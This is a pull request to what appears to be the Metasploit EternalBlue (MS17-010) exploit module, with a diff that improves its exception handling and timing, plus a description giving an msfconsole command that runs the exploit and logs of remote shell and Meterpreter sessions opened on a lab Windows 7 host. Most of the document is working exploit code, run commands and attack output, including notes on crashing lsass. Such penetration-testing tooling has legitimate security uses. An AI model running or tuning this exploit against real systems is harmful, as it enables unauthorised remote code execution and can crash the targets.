### PR TITLE
Tweak exception handling and timing of `ms17_010_eternalblue`

### DIFF
--- a/modules/exploits/windows/smb/ms17_010_eternalblue.rb
+++ b/modules/exploits/windows/smb/ms17_010_eternalblue.rb
@@ -59,7 +59,8 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'DefaultOptions' =>
         {
-          'EXITFUNC' => 'thread',
+          'EXITFUNC'   => 'thread',
+          'WfsDelay'  => 5,
         },
       'Privileged'     => true,
       'Payload'        =>
@@ -120,7 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote
         # we don't need this sleep, and need to find a way to remove it
         # problem is session_count won't increment until stage is complete :\
         secs = 0
-        while !session_created? and secs < 5
+        while !session_created? and secs < 30
           secs += 1
           sleep 1
         end
@@ -139,16 +140,24 @@ class MetasploitModule < Msf::Exploit::Remote
 
     rescue EternalBlueError => e
       print_error("#{e.message}")
+      return false
+    rescue ::RubySMB::Error::NegotiationFailure
+      print_error("SMB Negotiation Failure -- this often occurs when lsass crashes.  The target may reboot in 60 seconds.")
+      return false
     rescue  ::RubySMB::Error::UnexpectedStatusCode,
             ::Errno::ECONNRESET,
             ::Rex::HostUnreachable,
             ::Rex::ConnectionTimeout,
-            ::Rex::ConnectionRefused  => e
+            ::Rex::ConnectionRefused,
+            ::RubySMB::Error::CommunicationError => e
       print_error("#{e.class}: #{e.message}")
+      report_failure
+      return false
     rescue => error
       print_error(error.class.to_s)
       print_error(error.message)
       print_error(error.backtrace.join("\n"))
+      return false
     ensure
       # pass
     end
@@ -286,6 +295,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
+  '''
   #
   # Increase the default delay by five seconds since some kernel-mode
   # payloads may not run immediately.
@@ -293,7 +303,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def wfs_delay
     super + 5
   end
-
+  '''
 
   def smb2_grooms(grooms, payload_hdr_pkt)
     grooms.times do |groom_id|
@@ -337,7 +347,11 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("Sending malformed Trans2 packets")
     sock.put(trans2_pkt_nulled)
 
-    sock.get_once
+    begin
+      sock.get_once
+    rescue EOFError
+      vprint_error("No response back from SMB echo request.  Continuing anyway...")
+    end
 
     client.echo(count:1, data: "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00")
   end


### PR DESCRIPTION
This change targets exception handling in the `ms17_010_eternalblue` module.  Exhaustive testing revealed a few cases:
 - The exploit would succeed with a working payload, but not detect it had succeeded, which triggered a reattempted exploit.  This reattempted exploit would put the target at a higher risk of crashing.
 - Edge cases in SMB communication were causing otherwise successful exploits to fail.  Exception handling enables these edge cases to succeed.
 - Expected failures in SMB communication now display slightly prettier failure messages.
 - We can _sometimes_ detect if we've crashed the `lsass` service, which occasionally happens and will force the target into a reboot after a 60 second delay.

Finally, we've commented out a few lines that forcibly added a five-second WfsDelay.  In my testing, that proved not to be necessary, but I set a default `WfsDelay` of 5 seconds to err on the side of caution.  The difference is that now a user can manually `set WfsDelay 0` to improve the speed of failed exploit attempts.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploit/windows/smb/ms17_010_eternalblue`
- [x] `set WfsDelay 0`
- [x] (optionally) `set PAYLOAD [...]`
- [x] `run`

I'd recommend running the exploit repeatedly, as you'll likely crash the target and get to see the following exceptions occur.  For repeated running of the exploit and `shell` payload, consider using:

```
./msfconsole -qx 'use exploit/windows/smb/ms17_010_eternalblue; set RHOST 192.168.108.197; set WfsDelay 0; run; exit -y'
```

Ideally, you should see exactly what we've seen in the past:

```
[*] 192.168.108.197:445 - Connecting to target for exploitation.
[+] 192.168.108.197:445 - Connection established for exploitation.
[+] 192.168.108.197:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.108.197:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.108.197:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.108.197:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service
[*] 192.168.108.197:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1
[+] 192.168.108.197:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.108.197:445 - Trying exploit with 22 Groom Allocations.
[*] 192.168.108.197:445 - Sending all but last fragment of exploit packet
[*] 192.168.108.197:445 - Starting non-paged pool grooming
[+] 192.168.108.197:445 - Sending SMBv2 buffers
[+] 192.168.108.197:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.108.197:445 - Sending final SMBv2 buffers.
[*] 192.168.108.197:445 - Sending last fragment of exploit packet!
[*] 192.168.108.197:445 - Receiving response from exploit packet
[+] 192.168.108.197:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.108.197:445 - Sending egg to corrupted connection.
[*] 192.168.108.197:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (192.168.108.1:4444 -> 192.168.108.197:49182) at 2018-02-21 13:56:09 -0600
[+] 192.168.108.197:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.108.197:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.108.197:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>exit
exit
^C
Abort session 1? [y/N]  y

[*] 192.168.108.197 - Command shell session 1 closed.  Reason: User exit
```

This is no different than what it used to do.  The "magic" of this PR is that we should fix a number of edge cases and exceptions, some of which are recoverable and others that will improve the stability of the target.

### Exceptions (things that you might see, and it's okay)

We now handle a few exceptions slightly better.  For example, sometimes Eternalblue crashes the `lsass` service.  It's unavoidable.  If we see an SMB Negotiation Failure mid-exploit, that's often a sign that we just crashed the target.  By default, the target will reboot in 60 seconds:

```
[*] Started reverse TCP handler on 192.168.108.1:4444
[*] 192.168.108.197:445 - Connecting to target for exploitation.
[+] 192.168.108.197:445 - Connection established for exploitation.
[+] 192.168.108.197:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.108.197:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.108.197:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.108.197:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service
[*] 192.168.108.197:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1
[+] 192.168.108.197:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.108.197:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.108.197:445 - Sending all but last fragment of exploit packet
[*] 192.168.108.197:445 - Starting non-paged pool grooming
[-] 192.168.108.197:445 - SMB Negotiation Failure -- this often occurs when lsass crashes.  The target may reboot in 60 seconds.
[*] Exploit completed, but no session was created.
```

### Exceptions (things that you shouldn't see anymore)

An example of better timing comes in not detecting a session opening before reattempting the exploit.  Previously, you'd see a Meterpreter session opened, but the exploit would report failure and then reattempt.  (YOU SHOULDN'T SEE THIS ANYMORE!)

```
...
[+] 192.168.108.139:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.108.139:445 - Sending egg to corrupted connection.
[*] 192.168.108.139:445 - Triggering free of corrupted buffer.
[*] https://192.168.108.1:8443 handling request from 192.168.108.139; (UUID: 4ckxv34f) Staging x64 payload (206937 bytes) ...
[*] Meterpreter session 4 opened (192.168.108.1:8443 -> 192.168.108.139:49198) at 2018-02-05 15:23:38 -0600
[-] 192.168.108.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.108.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.108.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.108.139:445 - Connecting to target for exploitation.
...
```

Additionally, we catch an exception commonly encountered when the target hasn't quite booted yet:  (YOU SHOULDN'T SEE THIS ANYMORE!)

```
[*] 192.168.108.139:445 - Connecting to target for exploitation.
[-] 192.168.108.139:445 - RubySMB::Error::NegotiationFailure
[-] 192.168.108.139:445 - Unable to Negotiate with remote host, SMB1 may be disabled
[-] 192.168.108.139:445 - /Users/asoto/.rbenv/versions/2.4.3/lib/ruby/gems/2.4.0/gems/ruby_smb-0.0.18/lib/ruby_smb/client/negotiation.rb:22:in `rescue in negotiate'
/Users/asoto/.rbenv/versions/2.4.3/lib/ruby/gems/2.4.0/gems/ruby_smb-0.0.18/lib/ruby_smb/client/negotiation.rb:12:in `negotiate'
/Users/asoto/.rbenv/versions/2.4.3/lib/ruby/gems/2.4.0/gems/ruby_smb-0.0.18/lib/ruby_smb/client.rb:186:in `login'
/Users/asoto/git/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:314:in `smb1_anonymous_connect_ipc'
/Users/asoto/git/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:167:in `smb_eternalblue'
/Users/asoto/git/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:118:in `block in exploit'
/Users/asoto/.rbenv/versions/2.4.3/lib/ruby/gems/2.4.0/gems/activesupport-4.2.10/lib/active_support/core_ext/range/each.rb:7:in `each'
/Users/asoto/.rbenv/versions/2.4.3/lib/ruby/gems/2.4.0/gems/activesupport-4.2.10/lib/active_support/core_ext/range/each.rb:7:in `each_with_time_with_zone'
/Users/asoto/git/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:114:in `exploit'
/Users/asoto/git/metasploit-framework/lib/msf/core/exploit_driver.rb:206:in `job_run_proc'
/Users/asoto/git/metasploit-framework/lib/msf/core/exploit_driver.rb:167:in `run'
/Users/asoto/git/metasploit-framework/lib/msf/base/simple/exploit.rb:136:in `exploit_simple'
/Users/asoto/git/metasploit-framework/lib/msf/base/simple/exploit.rb:161:in `exploit_simple'
/Users/asoto/git/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:110:in `cmd_exploit'
/Users/asoto/git/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:214:in `cmd_rexploit'
/Users/asoto/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:548:in `run_command'
/Users/asoto/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:510:in `block in run_single'
/Users/asoto/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:504:in `each'
/Users/asoto/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:504:in `run_single'
/Users/asoto/git/metasploit-framework/lib/rex/ui/text/shell.rb:206:in `run'
/Users/asoto/git/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/Users/asoto/git/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
./msfconsole:48:in `<main>'
```

Finally, we catch an exception where the `get_once()` returns an EOFError.  Somewhat counterintuitively, as per documentation, this does not indicate failure; we should continue the exploit.  Previously, this EOFError triggered an exception and backtrace, like this:  (YOU SHOULDN'T SEE THIS ANYMORE!)

```
[*] 192.168.108.139:445 - Connecting to target for exploitation.
[+] 192.168.108.139:445 - Connection established for exploitation.
[+] 192.168.108.139:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.108.139:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.108.139:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.108.139:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service
[*] 192.168.108.139:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1
[+] 192.168.108.139:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.108.139:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.108.139:445 - Sending all but last fragment of exploit packet
[-] 192.168.108.139:445 - EOFError
[-] 192.168.108.139:445 - EOFError
[-] 192.168.108.139:445 - /Users/asoto/.rbenv/versions/2.4.3/lib/ruby/gems/2.4.0/gems/rex-core-0.1.12/lib/rex/io/stream.rb:103:in `rescue in has_read_data?'
/Users/asoto/.rbenv/versions/2.4.3/lib/ruby/gems/2.4.0/gems/rex-core-0.1.12/lib/rex/io/stream.rb:94:in `has_read_data?'
/Users/asoto/.rbenv/versions/2.4.3/lib/ruby/gems/2.4.0/gems/rex-core-0.1.12/lib/rex/io/stream.rb:197:in `get_once'
/Users/asoto/git/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:340:in `smb1_large_buffer'
/Users/asoto/git/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:196:in `smb_eternalblue'
/Users/asoto/git/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:118:in `block in exploit'
/Users/asoto/.rbenv/versions/2.4.3/lib/ruby/gems/2.4.0/gems/activesupport-4.2.10/lib/active_support/core_ext/range/each.rb:7:in `each'
/Users/asoto/.rbenv/versions/2.4.3/lib/ruby/gems/2.4.0/gems/activesupport-4.2.10/lib/active_support/core_ext/range/each.rb:7:in `each_with_time_with_zone'
/Users/asoto/git/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:114:in `exploit'
/Users/asoto/git/metasploit-framework/lib/msf/core/exploit_driver.rb:206:in `job_run_proc'
/Users/asoto/git/metasploit-framework/lib/msf/core/exploit_driver.rb:167:in `run'
/Users/asoto/git/metasploit-framework/lib/msf/base/simple/exploit.rb:136:in `exploit_simple'
/Users/asoto/git/metasploit-framework/lib/msf/base/simple/exploit.rb:161:in `exploit_simple'
/Users/asoto/git/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:110:in `cmd_exploit'
/Users/asoto/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:548:in `run_command'
/Users/asoto/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:510:in `block in run_single'
/Users/asoto/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:504:in `each'
/Users/asoto/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:504:in `run_single'
/Users/asoto/git/metasploit-framework/lib/rex/ui/text/shell.rb:206:in `run'
/Users/asoto/git/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/Users/asoto/git/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
./msfconsole:48:in `<main>'
```